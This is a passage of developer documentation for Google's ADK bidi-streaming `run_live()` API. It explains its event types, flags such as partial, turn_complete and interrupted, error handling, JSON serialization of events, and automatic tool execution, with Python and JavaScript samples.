the agent processes user input and generates responses. Understanding the different event types helps you build responsive UIs that handle text, audio, transcriptions, tool calls, metadata, and errors appropriately. Each event type is explained in detail in the sections below. | Event Type | Description | | --------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------- | | **[Text Events](#text-events)** | Model's text responses when using `response_modalities=["TEXT"]`; includes `partial`, `turn_complete`, and `interrupted` flags for streaming UI management | | **[Audio Events with Inline Data](#audio-events)** | Raw audio bytes (`inline_data`) streamed in real-time when using `response_modalities=["AUDIO"]`; ephemeral (not persisted to session) | | **[Audio Events with File Data](#audio-events-with-file-data)** | Audio aggregated into files and stored in artifacts; contains `file_data` references instead of raw bytes; can be persisted to session history | | **[Metadata Events](#metadata-events)** | Token usage information (`prompt_token_count`, `candidates_token_count`, `total_token_count`) for cost monitoring and quota tracking | | **[Transcription Events](#transcription-events)** | Speech-to-text for user input (`input_transcription`) and model output (`output_transcription`) when transcription is enabled in `RunConfig` | | **[Tool Call Events](#tool-call-events)** | Function call requests from the model; ADK handles execution automatically | | **[Error Events](#error-events)** | Model errors and connection issues with `error_code` and `error_message` fields | Source Reference See the complete event type handling implementation in [`runners.py`](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/runners.py) #### When run_live() Exits The `run_live()` event loop can exit under various conditions. Understanding these exit scenarios is crucial for proper resource cleanup and error handling: | Exit Condition | Trigger | Graceful? | Description | | ----------------------- | ------------------------------------------------------ | -------------------- | -------------------------------------------------------------------------- | | **Manual close** | `live_request_queue.close()` | ✅ Yes | User explicitly closes the queue, sending `LiveRequest(close=True)` signal | | **All agents complete** | Last agent in SequentialAgent calls `task_completed()` | ✅ Yes | After all sequential agents finish their tasks | | **Session timeout** | Live API duration limit reached | ⚠️ Connection closed | Session exceeds maximum duration (see limits below) | | **Early exit** | `end_invocation` flag set | ✅ Yes | Set during preprocessing or by tools/callbacks to terminate early | | **Empty event** | Queue closure signal | ✅ Yes | Internal signal indicating event stream has ended | | **Errors** | Connection errors, exceptions | ❌ No | Unhandled exceptions or connection failures | SequentialAgent Behavior When using `SequentialAgent`, the `task_completed()` function does NOT exit your application's `run_live()` loop. It only signals the end of the current agent's work, triggering a seamless transition to the next agent in the sequence. Your event loop continues receiving events from subsequent agents. The loop only exits when the **last** agent in the sequence completes. Learn More For session resumption and connection recovery details, see [Part 4: Live API Session Resumption](https://google.github.io/adk-docs/streaming/dev-guide/part4/#live-api-session-resumption). For multi-agent workflows, see [Best Practices for Multi-Agent Workflows](#best-practices-for-multi-agent-workflows). #### Events Saved to ADK `Session` Not all events yielded by `run_live()` are persisted to the ADK `Session`. When `run_live()` exits, only certain events are saved to the session while others remain ephemeral. Understanding which events are saved versus which are ephemeral is crucial for applications that use session persistence, resumption, or need to review conversation history. Source Reference See session event persistence logic in [`runners.py`](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/runners.py) **Events Saved to the ADK `Session`:** These events are persisted to the ADK `Session` and available in session history: - **Audio Events with File Data**: Saved to ADK `Session` only if `RunConfig.save_live_blob` is `True`; audio data is aggregated into files in artifacts with `file_data` references - **Usage Metadata Events**: Always saved to track token consumption across the ADK `Session` - **Non-Partial Transcription Events**: Final transcriptions are saved; partial transcriptions are not persisted - **Function Call and Response Events**: Always saved to maintain tool execution history - **Other Control Events**: Most control events (e.g., `turn_complete`, `finish_reason`) are saved **Events NOT Saved to the ADK `Session`:** These events are ephemeral and only yielded to callers during active streaming: - **Audio Events with Inline Data**: Raw audio `Blob` data in `inline_data` is never saved to the ADK `Session` (only yielded for real-time playback) - **Partial Transcription Events**: Only yielded for real-time display; final transcriptions are saved Audio Persistence To save audio conversations to the ADK `Session` for review or resumption, enable `RunConfig.save_live_blob = True`. This persists audio streams to artifacts. See [Part 4: save_live_blob](https://google.github.io/adk-docs/streaming/dev-guide/part4/#save_live_blob) for configuration details. ## Understanding Events Events are the core communication mechanism in ADK's Bidi-streaming system. This section explores the complete lifecycle of events—from how they're generated through multiple pipeline layers, to concurrent processing patterns that enable true real-time interaction, to practical handling of interruptions and turn completion. You'll learn about event types (text, audio, transcriptions, tool calls), serialization strategies for network transport, and the connection lifecycle that manages streaming sessions across both Gemini Live API and Vertex AI Live API platforms. ### The Event Class ADK's `Event` class is a Pydantic model that represents all communication in a streaming conversation. It extends `LlmResponse` and serves as the unified container for model responses, user input, transcriptions, and control signals. Source Reference See Event class implementation in [`event.py:30-128`](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/events/event.py#L30-L128) and [`llm_response.py:28-200`](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/models/llm_response.py#L28-L200) #### Key Fields **Essential for all applications:** - `content`: Contains text, audio, or function calls as `Content.parts` - `author`: Identifies who created the event (`"user"` or agent name) - `partial`: Distinguishes incremental chunks from complete text - `turn_complete`: Signals when to enable user input again - `interrupted`: Indicates when to stop rendering current output **For voice/audio applications:** - `input_transcription`: User's spoken words (when enabled in `RunConfig`) - `output_transcription`: Model's spoken words (when enabled in `RunConfig`) - `content.parts[].inline_data`: Audio data for playback **For tool execution:** - `content.parts[].function_call`: Model's tool invocation requests - `content.parts[].function_response`: Tool execution results - `long_running_tool_ids`: Track async tool execution **For debugging and diagnostics:** - `usage_metadata`: Token counts and billing information - `cache_metadata`: Context cache hit/miss statistics - `finish_reason`: Why the model stopped generating (e.g., STOP, MAX_TOKENS, SAFETY) - `error_code` / `error_message`: Failure diagnostics Author Semantics Transcription events have author `"user"`; model responses/events use the agent's name as `author` (not `"model"`). See [Event Authorship](#event-authorship) for details. #### Understanding Event Identity Events have two important ID fields: - **`event.id`**: Unique identifier for this specific event (format: UUID). Each event gets a new ID, even partial text chunks. - **`event.invocation_id`**: Shared identifier for all events in the current invocation (format: `"e-" + UUID`). In `run_live()`, all events from a single streaming session share the same invocation_id. (See [InvocationContext](#invocationcontext-the-execution-state-container) for more about invocations) **Usage:** ```python # All events in this streaming session will have the same invocation_id async for event in runner.run_live(...): print(f"Event ID: {event.id}") # Unique per event print(f"Invocation ID: {event.invocation_id}") # Same for all events in session ``` **Use cases:** - **event.id**: Track individual events in logs, deduplicate events - **event.invocation_id**: Group events by conversation session, filter session-specific events ### Event Authorship In live streaming mode, the `Event.author` field follows special semantics to maintain conversation clarity: **Model responses**: Authored by the **agent name** (e.g., `"my_agent"`), not the literal string `"model"` - This enables multi-agent scenarios where you need to track which agent generated the response - Example: `Event(author="customer_service_agent", content=...)` **User transcriptions**: Authored as `"user"` when the event contains transcribed user audio **How it works**: 1. Gemini Live API returns user audio transcriptions with `content.role == 'user'` 1. ADK's `get_author_for_event()` function checks for this role marker 1. If `content.role == 'user'`, ADK sets `Event.author` to `"user"` 1. Otherwise, ADK sets `Event.author` to the agent name (e.g., `"my_agent"`) This transformation ensures that transcribed user input is correctly attributed to the user in your application's conversation history, even though it flows through the model's response stream. - Example: Input audio transcription → `Event(author="user", input_transcription=..., content.role="user")` **Why this matters**: - In multi-agent applications, you can filter events by agent: `events = [e for e in stream if e.author == "my_agent"]` - When displaying conversation history, use `event.author` to show who said what - Transcription events are correctly attributed to the user even though they flow through the model Source Reference See author attribution logic in [`base_llm_flow.py:292-326`](https://github.com/google/adk-python/blob/fd2c0f556b786417a9f6add744827b07e7a06b7d/src/google/adk/flows/llm_flows/base_llm_flow.py#L287-L321) ### Event Types and Handling ADK streams distinct event types through `runner.run_live()` to support different interaction modalities: text responses for traditional chat, audio chunks for voice output, transcriptions for accessibility and logging, and tool call notifications for function execution. Each event includes metadata flags (`partial`, `turn_complete`, `interrupted`) that control UI state transitions and enable natural, human-like conversation flows. Understanding how to recognize and handle these event types is essential for building responsive streaming applications. ### Text Events The most common event type, containing the model's text responses when you specify `response_modalities` in `RunConfig` to `["TEXT"]` mode: **Usage:** ```python async for event in runner.run_live(...): if event.content and event.content.parts: if event.content.parts[0].text: text = event.content.parts[0].text if not event.partial: # Your logic to update streaming display update_streaming_display(text) ``` #### Default Response Modality Behavior When `response_modalities` is not explicitly set (i.e., `None`), ADK automatically defaults to `["AUDIO"]` mode at the start of `run_live()`. This means: - **If you provide no RunConfig**: Defaults to `["AUDIO"]` - **If you provide RunConfig without response_modalities**: Defaults to `["AUDIO"]` - **If you explicitly set response_modalities**: Uses your setting (no default applied) **Why this default exists**: Some native audio models require the response modality to be explicitly set. To ensure compatibility with all models, ADK defaults to `["AUDIO"]`. **For text-only applications**: Always explicitly set `response_modalities=["TEXT"]` in your RunConfig to avoid receiving unexpected audio events. **Example:** ```python # Explicit text mode run_config = RunConfig( response_modalities=["TEXT"], streaming_mode=StreamingMode.BIDI ) ``` **Key Event Flags:** These flags help you manage streaming text display and conversation flow in your UI: - `event.partial`: `True` for incremental text chunks during streaming; `False` for complete merged text - `event.turn_complete`: `True` when the model has finished its complete response - `event.interrupted`: `True` when user interrupted the model's response Learn More For detailed guidance on using `partial` `turn_complete` and `interrupted` flags to manage conversation flow and UI state, see [Handling Text Events](#handling-text-events). ### Audio Events When `response_modalities` is configured to `["AUDIO"]` in your `RunConfig`, the model generates audio output instead of text, and you'll receive audio data in the event stream: **Configuration:** ```python # Configure RunConfig for audio responses run_config = RunConfig( response_modalities=["AUDIO"], streaming_mode=StreamingMode.BIDI ) # Audio arrives as inline_data in event.content.parts async for event in runner.run_live(..., run_config=run_config): if event.content and event.content.parts: part = event.content.parts[0] if part.inline_data: # Audio event structure: # part.inline_data.data: bytes (raw PCM audio) # part.inline_data.mime_type: str (e.g., "audio/pcm") audio_data = part.inline_data.data mime_type = part.inline_data.mime_type print(f"Received {len(audio_data)} bytes of {mime_type}") # Your logic to play audio await play_audio(audio_data) ``` Learn More - **`response_modalities` controls how the model generates output**—you must choose either `["TEXT"]` for text responses or `["AUDIO"]` for audio responses per session. You cannot use both modalities simultaneously. See [Part 4: Response Modalities](https://google.github.io/adk-docs/streaming/dev-guide/part4/#response-modalities) for configuration details. - For comprehensive coverage of audio formats, sending/receiving audio, and audio processing flow, see [Part 5: How to Use Audio, Image and Video](https://google.github.io/adk-docs/streaming/dev-guide/part5/index.md). ### Audio Events with File Data When audio data is aggregated and saved as files in artifacts, ADK yields events containing `file_data` references instead of raw `inline_data`. This is useful for persisting audio to session history. Source Reference See audio file aggregation logic in [`audio_cache_manager.py:156-178`](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/flows/llm_flows/audio_cache_manager.py#L156-L178) **Receiving Audio File References:** ```python async for event in runner.run_live( user_id=user_id, session_id=session_id, live_request_queue=queue, run_config=run_config ): if event.content and event.content.parts: for part in event.content.parts: if part.file_data: # Audio aggregated into a file saved in artifacts file_uri = part.file_data.file_uri mime_type = part.file_data.mime_type print(f"Audio file saved: {file_uri} ({mime_type})") # Retrieve audio file from artifact service for playback ``` **File Data vs Inline Data:** - **Inline Data** (`part.inline_data`): Raw audio bytes streamed in real-time; ephemeral and not saved to session - **File Data** (`part.file_data`): Reference to audio file stored in artifacts; can be persisted to session history Both input and output audio data are aggregated into audio files and saved in the artifact service. The file reference is included in the event as `file_data`, allowing you to retrieve the audio later. Session Persistence To save audio events with file data to session history, enable `RunConfig.save_live_blob = True`. This allows audio conversations to be reviewed or replayed from persisted sessions. ### Metadata Events Usage metadata events contain token usage information for monitoring costs and quota consumption. The `run_live()` method yields these events separately from content events. Source Reference See usage metadata structure in [`llm_response.py:105`](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/models/llm_response.py#L105) **Accessing Token Usage:** ```python async for event in runner.run_live( user_id=user_id, session_id=session_id, live_request_queue=queue, run_config=run_config ): if event.usage_metadata: print(f"Prompt tokens: {event.usage_metadata.prompt_token_count}") print(f"Response tokens: {event.usage_metadata.candidates_token_count}") print(f"Total tokens: {event.usage_metadata.total_token_count}") # Track cumulative usage across the session total_tokens += event.usage_metadata.total_token_count or 0 ``` **Available Metadata Fields:** - `prompt_token_count`: Number of tokens in the input (prompt and context) - `candidates_token_count`: Number of tokens in the model's response - `total_token_count`: Sum of prompt and response tokens - `cached_content_token_count`: Number of tokens served from cache (when using context caching) Cost Monitoring Usage metadata events allow real-time cost tracking during streaming sessions. You can implement quota limits, display usage to users, or log metrics for billing and analytics. ### Transcription Events When transcription is enabled in `RunConfig`, you receive transcriptions as separate events: **Configuration:** ```python async for event in runner.run_live(...): # User's spoken words (when input_audio_transcription enabled) if event.input_transcription: # Your logic to display user transcription display_user_transcription(event.input_transcription) # Model's spoken words (when output_audio_transcription enabled) if event.output_transcription: # Your logic to display model transcription display_model_transcription(event.output_transcription) ``` These enable accessibility features and conversation logging without separate transcription services. Learn More For details on enabling transcription in `RunConfig` and understanding transcription delivery, see [Part 5: Audio Transcription](https://google.github.io/adk-docs/streaming/dev-guide/part5/#audio-transcription). ### Tool Call Events When the model requests tool execution: **Usage:** ```python async for event in runner.run_live(...): if event.content and event.content.parts: for part in event.content.parts: if part.function_call: # Model is requesting a tool execution tool_name = part.function_call.name tool_args = part.function_call.args # ADK handles execution automatically ``` ADK processes tool calls automatically—you typically don't need to handle these directly unless implementing custom tool execution logic. Learn More For details on how ADK automatically executes tools, handles function responses, and supports long-running and streaming tools, see [Automatic Tool Execution in run_live()](#automatic-tool-execution-in-run_live). ### Error Events Production applications need robust error handling to gracefully handle model errors and connection issues. ADK surfaces errors through the `error_code` and `error_message` fields: **Usage:** ```python import logging logger = logging.getLogger(__name__) try: async for event in runner.run_live(...): # Handle errors from the model or connection if event.error_code: logger.error(f"Model error: {event.error_code} - {event.error_message}") # Send error notification to client await websocket.send_json({ "type": "error", "code": event.error_code, "message": event.error_message }) # Decide whether to continue or break based on error severity if event.error_code in ["SAFETY", "PROHIBITED_CONTENT", "BLOCKLIST"]: # Content policy violations - usually cannot retry break # Terminal error - exit loop elif event.error_code == "MAX_TOKENS": # Token limit reached - may need to adjust configuration break # For other errors, you might continue or implement retry logic continue # Transient error - keep processing # Normal event processing only if no error if event.content and event.content.parts: # ... handle content pass finally: queue.close() # Always cleanup connection ``` Note The above example shows the basic structure for checking `error_code` and `error_message`. For production-ready error handling with user notifications, retry logic, and context logging, see the real-world scenarios below. **When to use `break` vs `continue`:** The key decision is: *Can the model's response continue meaningfully?* **Scenario 1: Content Policy Violation (Use `break`)** You're building a customer support chatbot. A user asks an inappropriate question that triggers a SAFETY filter: **Example:** ```python if event.error_code in ["SAFETY", "PROHIBITED_CONTENT", "BLOCKLIST"]: # Model has stopped generating - continuation is impossible await websocket.send_json({ "type": "error", "message": "I can't help with that request. Please ask something else." }) break # Exit loop - model won't send more events for this turn ``` **Why `break`?** The model has terminated its response. No more events will come for this turn. Continuing would just waste resources waiting for events that won't arrive. ______________________________________________________________________ **Scenario 2: Network Hiccup During Streaming (Use `continue`)** You're building a voice transcription service. Midway through transcribing, there's a brief network glitch: **Example:** ```python if event.error_code == "UNAVAILABLE": # Temporary network issue logger.warning(f"Network hiccup: {event.error_message}") # Don't notify user for brief transient issues that may self-resolve continue # Keep listening - model may recover and continue ``` **Why `continue`?** This is a transient error. The connection might recover, and the model may continue streaming the transcription. Breaking would prematurely end a potentially recoverable stream. User Notifications For brief transient errors (lasting \<1 second), don't notify the user—they won't notice the hiccup. But if the error persists or impacts the user experience (e.g., streaming pauses for >3 seconds), notify them gracefully: "Experiencing connection issues, retrying..." ______________________________________________________________________ **Scenario 3: Token Limit Reached (Use `break`)** You're generating a long-form article and hit the maximum token limit: **Example:** ```python if event.error_code == "MAX_TOKENS": # Model has reached output limit await websocket.send_json({ "type": "complete", "message": "Response reached maximum length", "truncated": True }) break # Model has finished - no more tokens will be generated ``` **Why `break`?** The model has reached its output limit and stopped. Continuing won't yield more tokens. ______________________________________________________________________ **Scenario 4: Rate Limit with Retry Logic (Use `continue` with backoff)** You're running a high-traffic application that occasionally hits rate limits: **Example:** ```python retry_count = 0 max_retries = 3 async for event in runner.run_live(...): if event.error_code == "RESOURCE_EXHAUSTED": retry_count += 1 if retry_count > max_retries: logger.error("Max retries exceeded") break # Give up after multiple failures # Wait and retry await asyncio.sleep(2 ** retry_count) # Exponential backoff continue # Keep listening - rate limit may clear # Reset counter on successful event retry_count = 0 ``` **Why `continue` (initially)?** Rate limits are often temporary. With exponential backoff, the stream may recover. But after multiple failures, `break` to avoid infinite waiting. ______________________________________________________________________ **Decision Framework:** | Error Type | Action | Reason | | ---------------------------------- | --------------------------- | ------------------------------- | | `SAFETY`, `PROHIBITED_CONTENT` | `break` | Model terminated response | | `MAX_TOKENS` | `break` | Model finished generating | | `UNAVAILABLE`, `DEADLINE_EXCEEDED` | `continue` | Transient network/timeout issue | | `RESOURCE_EXHAUSTED` (rate limit) | `continue` with retry logic | May recover after brief wait | | Unknown errors | `continue` (with logging) | Err on side of caution | **Critical: Always use `finally` for cleanup** **Usage:** ```python try: async for event in runner.run_live(...): # ... error handling ... finally: queue.close() # Cleanup runs whether you break or finish normally ``` Whether you `break` or the loop finishes naturally, `finally` ensures the connection closes properly. **Error Code Reference:** ADK error codes come from the underlying Gemini API. Here are the most common error codes you'll encounter: | Error Code | Category | Description | Recommended Action | | -------------------- | -------------- | ------------------------------------ | ------------------------------------------- | | `SAFETY` | Content Policy | Content violates safety policies | `break` - Inform user, log incident | | `PROHIBITED_CONTENT` | Content Policy | Content contains prohibited material | `break` - Show policy violation message | | `BLOCKLIST` | Content Policy | Content matches blocklist | `break` - Alert user, don't retry | | `MAX_TOKENS` | Limits | Output reached maximum token limit | `break` - Truncate gracefully, summarize | | `RESOURCE_EXHAUSTED` | Rate Limiting | Quota or rate limit exceeded | `continue` with backoff - Retry after delay | | `UNAVAILABLE` | Transient | Service temporarily unavailable | `continue` - Retry, may self-resolve | | `DEADLINE_EXCEEDED` | Transient | Request timeout exceeded | `continue` - Consider retry with backoff | | `CANCELLED` | Client | Client cancelled the request | `break` - Clean up resources | | `UNKNOWN` | System | Unspecified error occurred | `continue` with logging - Log for analysis | For complete error code listings and descriptions, refer to the official documentation: Official Documentation - **FinishReason** (when model stops generating tokens): [Google AI for Developers](https://ai.google.dev/api/python/google/ai/generativelanguage/Candidate/FinishReason) | [Vertex AI](https://cloud.google.com/vertex-ai/generative-ai/docs/model-reference/gemini) - **BlockedReason** (when prompts are blocked by content filters): [Google AI for Developers](https://ai.google.dev/api/python/google/ai/generativelanguage/GenerateContentResponse/PromptFeedback/BlockReason) | [Vertex AI](https://cloud.google.com/vertex-ai/generative-ai/docs/multimodal/configure-safety-attributes) - **ADK Implementation**: [`llm_response.py:145-200`](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/models/llm_response.py#L145-L200) **Best practices for error handling:** - **Always check for errors first**: Process `error_code` before handling content to avoid processing invalid events - **Log errors with context**: Include session_id and user_id in error logs for debugging - **Categorize errors**: Distinguish between retryable errors (transient failures) and terminal errors (content policy violations) - **Notify users gracefully**: Show user-friendly error messages instead of raw error codes - **Implement retry logic**: For transient errors, consider automatic retry with exponential backoff - **Monitor error rates**: Track error types and frequencies to identify systemic issues - **Handle content policy errors**: For `SAFETY`, `PROHIBITED_CONTENT`, and `BLOCKLIST` errors, inform users that their content violates policies ## Handling Text Events Understanding the `partial`, `interrupted`, and `turn_complete` flags is essential for building responsive streaming UIs. These flags enable you to provide real-time feedback during streaming, handle user interruptions gracefully, and detect conversation boundaries for proper state management. ### Handling `partial` This flag helps you distinguish between incremental text chunks and complete merged text, enabling smooth streaming displays with proper final confirmation. **Usage:** ```python async for event in runner.run_live(...): if event.content and event.content.parts: if event.content.parts[0].text: text = event.content.parts[0].text if event.partial: # Your streaming UI update logic here update_streaming_display(text) else: # Your complete message display logic here display_complete_message(text) ``` **`partial` Flag Semantics:** - `partial=True`: The text in this event is **incremental**—it contains ONLY the new text since the last event - `partial=False`: The text in this event is **complete**—it contains the full merged text for this response segment Note The `partial` flag is only meaningful for text content (`event.content.parts[].text`). For other content types: - **Audio events**: Each audio chunk in `inline_data` is independent (no merging occurs) - **Tool calls**: Function calls and responses are always complete (partial doesn't apply) - **Transcriptions**: Transcription events are always complete when yielded **Example Stream:** ```text Event 1: partial=True, text="Hello", turn_complete=False Event 2: partial=True, text=" world", turn_complete=False Event 3: partial=False, text="Hello world", turn_complete=False Event 4: partial=False, text="", turn_complete=True # Turn done ``` **Important timing relationships**: - `partial=False` can occur **multiple times** in a turn (e.g., after each sentence) - `turn_complete=True` occurs **once** at the very end of the model's complete response, in a **separate event** - You may receive: `partial=False` (sentence 1) → `partial=False` (sentence 2) → `turn_complete=True` - The merged text event (`partial=False` with content) is always yielded **before** the `turn_complete=True` event Note ADK internally accumulates all text from `partial=True` events. When you receive an event with `partial=False`, the text content equals the sum of all preceding `partial=True` chunks. This means: - You can safely ignore all `partial=True` events and only process `partial=False` events if you don't need streaming display - If you do display `partial=True` events, the `partial=False` event provides the complete merged text for validation or storage - This accumulation is handled automatically by ADK's `StreamingResponseAggregator`—you don't need to manually concatenate partial text chunks #### Handling `interrupted` Flag This enables natural conversation flow by detecting when users interrupt the model mid-response, allowing you to stop rendering outdated content immediately. When users send new input while the model is still generating a response (common in voice conversations), you'll receive an event with `interrupted=True`: **Usage:** ```python async for event in runner.run_live(...): if event.interrupted: # Your logic to stop displaying partial text and clear typing indicators stop_streaming_display() # Your logic to show interruption in UI (optional) show_user_interruption_indicator() ``` **Example - Interruption Scenario:** ```text Model: "The weather in San Francisco is currently..." User: [interrupts] "Actually, I meant San Diego" → event.interrupted=True received → Your app: stop rendering model response, clear UI → Model processes new input Model: "The weather in San Diego is..." ``` **When to use interruption handling:** - **Voice conversations**: Stop audio playback immediately when user starts speaking - **Clear UI state**: Remove typing indicators and partial text displays - **Conversation logging**: Mark which responses were interrupted (incomplete) - **User feedback**: Show visual indication that interruption was recognized #### Handling `turn_complete` Flag This signals conversation boundaries, allowing you to update UI state (enable input controls, hide indicators) and mark proper turn boundaries in logs and analytics. When the model finishes its complete response, you'll receive an event with `turn_complete=True`: **Usage:** ```python async for event in runner.run_live(...): if event.turn_complete: # Your logic to update UI to show "ready for input" state enable_user_input() # Your logic to hide typing indicator hide_typing_indicator() # Your logic to mark conversation boundary in logs log_turn_boundary() ``` **Event Flag Combinations:** Understanding how `turn_complete` and `interrupted` combine helps you handle all conversation states: | Scenario | turn_complete | interrupted | Your App Should | | ----------------------------- | ------------- | ----------- | ---------------------------------------- | | Normal completion | True | False | Enable input, show "ready" state | | User interrupted mid-response | False | True | Stop display, clear partial content | | Interrupted at end | True | True | Same as normal completion (turn is done) | | Mid-response (partial text) | False | False | Continue displaying streaming text | **Implementation:** ```python async for event in runner.run_live(...): # Handle streaming text if event.content and event.content.parts and event.content.parts[0].text: if event.partial: # Your logic to show typing indicator and update partial text update_streaming_text(event.content.parts[0].text) else: # Your logic to display complete text chunk display_text(event.content.parts[0].text) # Handle interruption if event.interrupted: # Your logic to stop audio playback and clear indicators stop_audio_playback() clear_streaming_indicators() # Handle turn completion if event.turn_complete: # Your logic to enable user input show_input_ready_state() enable_microphone() ``` **Common Use Cases:** - **UI state management**: Show/hide "ready for input" indicators, typing animations, microphone states - **Audio playback control**: Know when to stop rendering audio chunks from the model - **Conversation logging**: Mark clear boundaries between turns for history/analytics - **Streaming optimization**: Stop buffering when turn is complete **Turn completion and caching:** Audio/transcript caches are flushed automatically at specific points during streaming: - **On turn completion** (`turn_complete=True`): Both user and model audio caches are flushed - **On interruption** (`interrupted=True`): Model audio cache is flushed - **On generation completion**: Model audio cache is flushed ## Serializing Events to JSON ADK `Event` objects are Pydantic models, which means they come with powerful serialization capabilities. The `model_dump_json()` method is particularly useful for streaming events over network protocols like WebSockets or Server-Sent Events (SSE). ### Using event.model_dump_json() This provides a simple one-liner to convert ADK events into JSON format that can be sent over network protocols like WebSockets or SSE. The `model_dump_json()` method serializes an `Event` object to a JSON string: Demo implementation: [main.py:219-234](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L219-L234) ```python async def downstream_task() -> None: """Receives Events from run_live() and sends to WebSocket.""" async for event in runner.run_live( user_id=user_id, session_id=session_id, live_request_queue=live_request_queue, run_config=run_config ): event_json = event.model_dump_json(exclude_none=True, by_alias=True) await websocket.send_text(event_json) ``` **What gets serialized:** - Event metadata (author, server_content fields) - Content (text, audio data, function calls) - Event flags (partial, turn_complete, interrupted) - Transcription data (input_transcription, output_transcription) - Tool execution information **When to use `model_dump_json()`:** - ✅ Streaming events over network (WebSocket, SSE) - ✅ Logging/persistence to JSON files - ✅ Debugging and inspection - ✅ Integration with JSON-based APIs **When NOT to use it:** - ❌ In-memory processing (use event objects directly) - ❌ High-frequency events where serialization overhead matters - ❌ When you only need a few fields (extract them directly instead) Performance Warning Binary audio data in `event.content.parts[].inline_data` will be base64-encoded when serialized to JSON, significantly increasing payload size (~133% overhead). For production applications with audio, send binary data separately using WebSocket binary frames or multipart HTTP. See [Optimization for Audio Transmission](#optimization-for-audio-transmission) for details. ### Serialization options This allows you to reduce payload sizes by excluding unnecessary fields, improving network performance and client processing speed. Pydantic's `model_dump_json()` supports several useful parameters: **Usage:** ```python # Exclude None values for smaller payloads (with camelCase field names) event_json = event.model_dump_json(exclude_none=True, by_alias=True) # Custom exclusions (e.g., skip large binary audio) event_json = event.model_dump_json( exclude={'content': {'parts': {'__all__': {'inline_data'}}}}, by_alias=True ) # Include only specific fields event_json = event.model_dump_json( include={'content', 'author', 'turn_complete', 'interrupted'}, by_alias=True ) # Pretty-printed JSON (for debugging) event_json = event.model_dump_json(indent=2, by_alias=True) ``` The bidi-demo uses `exclude_none=True` to minimize payload size by omitting fields with None values. ### Deserializing on the Client This shows how to parse and handle serialized events on the client side, enabling responsive UI updates based on event properties like turn completion and interruptions. On the client side (JavaScript/TypeScript), parse the JSON back to objects: Demo implementation: [app.js:339-688](https://github.com/google/adk-samples/blob/2f7b82f182659e0990bfb86f6ef400dd82633c07/python/agents/bidi-demo/app/static/js/app.js#L341-L690) ```javascript // Handle incoming messages websocket.onmessage = function (event) { // Parse the incoming ADK Event const adkEvent = JSON.parse(event.data); // Handle turn complete event if (adkEvent.turnComplete === true) { // Remove typing indicator from current message if (currentBubbleElement) { const textElement = currentBubbleElement.querySelector(".bubble-text"); const typingIndicator = textElement.querySelector(".typing-indicator"); if (typingIndicator) { typingIndicator.remove(); } } currentMessageId = null; currentBubbleElement = null; return; } // Handle interrupted event if (adkEvent.interrupted === true) { // Stop audio playback if it's playing if (audioPlayerNode) { audioPlayerNode.port.postMessage({ command: "endOfAudio" }); } // Keep the partial message but mark it as interrupted if (currentBubbleElement) { const textElement = currentBubbleElement.querySelector(".bubble-text"); // Remove typing indicator const typingIndicator = textElement.querySelector(".typing-indicator"); if (typingIndicator) { typingIndicator.remove(); } // Add interrupted marker currentBubbleElement.classList.add("interrupted"); } currentMessageId = null; currentBubbleElement = null; return; } // Handle content events (text or audio) if (adkEvent.content && adkEvent.content.parts) { const parts = adkEvent.content.parts; for (const part of parts) { // Handle text if (part.text) { // Add a new message bubble for a new turn if (currentMessageId == null) { currentMessageId = Math.random().toString(36).substring(7); currentBubbleElement = createMessageBubble(part.text, false, true); currentBubbleElement.id = currentMessageId; messagesDiv.appendChild(currentBubbleElement); } else { // Update the existing message bubble with accumulated text const existingText = currentBubbleElement.querySelector(".bubble-text").textContent; const cleanText = existingText.replace(/\.\.\.$/, ''); updateMessageBubble(currentBubbleElement, cleanText + part.text, true); } scrollToBottom(); } } } }; ``` Demo Implementation See the complete WebSocket message handler in [`app.js:339-688`](https://github.com/google/adk-samples/blob/2f7b82f182659e0990bfb86f6ef400dd82633c07/python/agents/bidi-demo/app/static/js/app.js#L341-L690) ### Optimization for Audio Transmission Base64-encoded binary audio in JSON significantly increases payload size. For production applications, use a single WebSocket connection with both binary frames (for audio) and text frames (for metadata): **Usage:** ```python async for event in runner.run_live(...): # Check for binary audio has_audio = ( event.content and event.content.parts and any(p.inline_data for p in event.content.parts) ) if has_audio: # Send audio via binary WebSocket frame for part in event.content.parts: if part.inline_data: await websocket.send_bytes(part.inline_data.data) # Send metadata only (much smaller) metadata_json = event.model_dump_json( exclude={'content': {'parts': {'__all__': {'inline_data'}}}}, by_alias=True ) await websocket.send_text(metadata_json) else: # Text-only events can be sent as JSON await websocket.send_text(event.model_dump_json(exclude_none=True, by_alias=True)) ``` This approach reduces bandwidth by ~75% for audio-heavy streams while maintaining full event metadata. ## Automatic Tool Execution in run_live() Source Reference See automatic tool execution implementation in [`functions.py`](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/flows/llm_flows/functions.py) One of the most powerful features of ADK's `run_live()` is **automatic tool execution**. Unlike the raw Gemini Live API, which requires you to manually handle tool calls and responses, ADK abstracts this complexity entirely. ### The Challenge with Raw Live API When using the Gemini Live API directly (without ADK), tool use requires manual orchestration: 1. **Receive** function calls from the model 1. **Execute** the tools yourself 1. **Format** function responses correctly 1. **Send** responses back to the model This creates significant implementation overhead, especially in streaming contexts where you need to handle multiple concurrent tool calls, manage errors, and coordinate with ongoing audio/text streams. ### How ADK Simplifies Tool Use With ADK, tool execution becomes declarative. Simply define tools on your Agent: Demo implementation: [agent.py:11-16](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/google_search_agent/agent.py#L11-L16) ```python import os from google.adk.agents import Agent from google.adk.tools import google_search agent = Agent( name="google_search_agent", model=os.getenv("DEMO_AGENT_MODEL", "gemini-2.5-flash-native-audio-preview-12-2025"), tools=[google_search], instruction="You are a helpful assistant that can search the web." ) ``` When you call `runner.run_live()`, ADK automatically: - 